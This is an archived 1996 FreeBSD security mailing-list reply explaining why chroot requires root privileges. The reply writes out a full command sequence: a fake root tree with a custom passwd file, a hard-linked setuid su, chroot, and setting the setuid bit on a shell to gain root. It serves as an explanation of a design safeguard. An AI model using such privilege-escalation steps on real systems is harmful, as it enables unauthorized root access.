Date: Mon, 9 Sep 1996 15:18:34 -0400 From: Garrett Wollman <wollman@lcs.mit.edu> To: rkw@dataplex.net (Richard Wackerbarth) Cc: security@freebsd.org Subject: Question about chroot Message-ID: <9609091918.AA06748@halloran-eldar.lcs.mit.edu> In-Reply-To: <v02140b0bae5a10f1521b@[208.2.87.4]> References: <v02140b0bae5a10f1521b@[208.2.87.4]>
next in thread | previous in thread | raw e-mail | index | archive | help
<<On Mon, 9 Sep 1996 13:26:21 -0500, rkw@dataplex.net (Richard Wackerbarth) said: > In looking at some of the "make" problems, I ran up against a > characteristic of "chroot" that puzzles me. > In order to chroot, you must be root. Why? > It appears to me than the only thing that chroot does is to restrict the > "visable" tree. It does not ADD anything that is not already there. mkdir /usr/tmp/hack mkdir /usr/tmp/hack/etc cp my-passwd-files /usr/tmp/hack/etc mkdir /usr/tmp/hack/bin cp /bin/sh /tmp/hack/bin ln /usr/bin/su /usr/tmp/hack/bin mkdir -p /usr/tmp/hack/usr/lib ln /usr/lib/* /usr/tmp/hack/lib chroot /usr/tmp/hack /bin/sh $ /bin/su Password: my-password # chmod u+s /bin/sh # ^D $ ^D /usr/tmp/hack/bin/sh # whatever-I-want -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, ANA, or NSA| - Susan Aglukark and Chad Irschick
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?9609091918.AA06748>